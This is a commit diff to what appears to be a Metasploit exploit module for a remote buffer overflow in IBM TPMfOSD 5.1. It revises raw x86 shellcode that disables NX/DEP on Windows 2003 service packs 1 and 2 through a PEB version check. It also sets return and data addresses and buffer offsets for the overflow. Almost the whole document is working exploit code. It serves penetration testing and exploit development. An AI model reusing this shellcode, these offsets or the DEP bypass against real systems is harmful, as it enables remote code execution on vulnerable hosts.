From topo:

1) It uses the rembo.exe Data section to prevent a crash
2) The prepend code has been modified to only disable NX on 2K3 SP1-2  
(else it crashes 2K3 SP0)



git-svn-id: file:///home/svn/framework3/trunk@4863 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/http/ibm_tpmfosd_overflow.rb

@@ -39,17 +39,22 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
 					'Prepend' => 
 							# Disable NX on 2k3 to upload data on the stack
 							# (service crashes if the stack is switched to the heap)
-							"\xb9\x70\x02\xfe\x7f" + # mov ecx, 0x7ffe0270
-							"\x80\x39\x02"         + # cmp byte ptr [ecx], 2
-							"\x75\x15"             + # jmp after
-							"\xba\x00\x03\xfe\x7f" + # mov edx, 0x7ffe0300
-							"\xb8\xed\x00\x00\x00" + # mov eax, 0xed
-							"\x6a\x04"             + # push 4
-							"\x51"                 + # push ecx
-							"\x6a\x22"             + # push 22
-							"\x6a\xff"             + # push -1
-							"\x6a\xff"             + # push -1 (padding)
-							"\xff\x12",              # call dword ptr[edx]
+							"\x64\x8b\x0d\x30\x00\x00\x00"              + # mov ecx, dword ptr fs:[0x30] ; PEB
+							"\x83\xb9\xa4\x00\x00\x00\x05"              + # cmp dword ptr [ecx+0xa4], 5  ; MajorVersion == 5
+							"\x75\x30"                                  + # jnz after
+							"\x83\xb9\xa8\x00\x00\x00\x02"              + # cmp dword ptr [ecx+0xa8], 2  ; MinorVersion == 2
+							"\x75\x27"                                  + # jnz after
+							"\x81\xb9\xac\x00\x00\x00\xce\x0e\x00\x00"  + # cmp dword ptr [ecx+0xac], 0xece  ; BuildVersion (> SP0)
+							"\x76\x1b"                                  + # jbe after
+							"\x8d\x89\xa8\x00\x00\x00"                  + # lea ecx, [ecx+0xa8]
+							"\xba\x00\x03\xfe\x7f"                      + # mov edx, 0x7ffe0300
+							"\xb8\xed\x00\x00\x00"                      + # mov eax, 0xed
+							"\x6a\x04"                                  + # push 4
+							"\x51"                                      + # push ecx
+							"\x6a\x22"                                  + # push 22
+							"\x6a\xff"                                  + # push -1
+							"\x6a\xff"                                  + # push -1 (padding)
+							"\xff\x12",                                   # call dword ptr[edx]
 					'StackAdjustment' => -3500,
 				},
 			'Platform'       => 'win',
@@ -57,7 +62,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
 				[
 					['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],
 					# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)
-					['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000 }],
+					['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],
 				],
 			'DisclosureDate' => 'May 02 2007',
 			'DefaultTarget'  => 0))
@@ -88,7 +93,7 @@ class Exploits::Windows::Http::Ibm_Tpmfosd_Overflow < Msf::Exploit::Remote
 			# retn
 
 			auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')
-			auth[ 2100, 4 ] = [ ib + 0x11010 ].pack('V')
+			auth[ 2100, 4 ] = [ target['Data'] ].pack('V')
 			auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')
 			auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')